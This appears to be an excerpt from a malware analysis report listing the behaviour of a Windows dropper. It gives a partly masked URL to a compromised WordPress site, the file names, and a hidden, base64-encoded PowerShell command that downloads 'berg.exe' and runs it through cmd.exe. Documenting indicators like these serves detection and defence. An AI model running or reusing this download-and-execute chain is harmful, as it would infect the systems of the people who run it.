Technical Information
- http://ma###as.com.hk/wp-content/plugins/freedom/_sec/berg.exe as %temp%\nvbackend.exe
- http://ma###as.com.hk/wp-content/plugins/freedom/_sec/berg.exe
- DNS ASK ma###as.com.hk
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAG0AYQB0AHQAYwBhAHMALgBjAG8AbQAuAGgAawAv...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c %temp%\nvbackend.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c %temp%\nvbackend.exe